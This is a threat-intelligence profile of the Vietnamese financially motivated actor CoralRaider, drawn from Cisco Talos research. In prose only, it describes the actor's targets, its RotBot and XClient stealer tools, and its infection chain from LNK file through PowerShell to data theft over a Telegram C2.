CoralRaider – Threat Actor

Overview

Cisco Talos recently uncovered a new threat actor known as “CoralRaider,” suspected to originate from Vietnam and motivated by financial gain. Operating since at least 2023, CoralRaider has targeted victims across various Asian and Southeast Asian countries. Their primary objective is to steal credentials, financial data, and social media accounts, including those associated with business and advertising.

In their campaigns, CoralRaider utilizes advanced tools such as RotBot, a customized variant of QuasarRAT, and the XClient stealer. Notably, they employ the dead drop technique, utilizing a legitimate service to host the command-and-control (C2) configuration file. Additionally, CoralRaider incorporates uncommon living-off-the-land binaries (LoLBins) like Windows Forfiles.exe and FoDHelper.exe into their operations, highlighting the group’s sophisticated and evolving cyber strategies.

Common targets

India, China, South Korea, Bangladesh, Pakistan, Indonesia, Vietnam.

Attack Vectors

The initial vector of the campaign is the Windows shortcut file. Researchers are unclear on the technique the actor used to deliver the LNKs to the victims.

How they operate

The attack commences when a user opens a malicious Windows shortcut file, triggering the download and execution of an HTML application file (HTA) from a server controlled by the attacker. Within the HTA file lies an embedded, obfuscated Visual Basic script, which is executed. This malicious script, in turn, triggers the execution of an embedded PowerShell script in memory. This PowerShell script, after decryption, sequentially executes three other PowerShell scripts. These scripts are designed to conduct anti-VM and anti-analysis checks, bypass User Access Controls, disable notifications from Windows and applications on the victim’s machine, and ultimately download and execute the RotBot. Upon its initial execution, RotBot, a variant of the QuasarRAT client, conducts evasion checks to avoid detection on the victim’s machine and performs system reconnaissance. Subsequently, RotBot connects to a host on a legitimate domain, likely controlled by the threat actor, to retrieve the configuration file necessary for connecting to the command-and-control (C2) server. In this campaign, CoralRaider utilizes the Telegram bot as the C2 channel. Once connected to the Telegram C2, RotBot loads the XClient stealer payload into the victim’s memory from its resources and executes its plugin program. The XClient stealer plugin conducts further anti-VM and anti-virus software checks on the victim’s system. It proceeds to gather various data, including browser information such as cookies, stored credentials, and financial details like credit card information. Additionally, the plugin harvests data from social media platforms like Facebook, Instagram, TikTok business ads, and YouTube, as well as application data from Telegram desktop and Discord applications on the victim’s machine. Screenshots of the victim’s desktop are captured and saved as PNG files in the temporary folder of the victim’s machine. Subsequently, the stealer plugin compiles the collected data from browsers and social media accounts into a text file, creates a ZIP archive, and exfiltrates both the PNG and ZIP files to the attacker’s Telegram bot C2.

Significant Attacks

CoralRaider” is of Vietnamese origin and financially motivated. CoralRaider has been operating since at least 2023, targeting victims in several Asian and Southeast Asian countries. (April 2024) References:

• CoralRaider targets victims’ data and social media accounts.
• Coralraider targets social media accounts.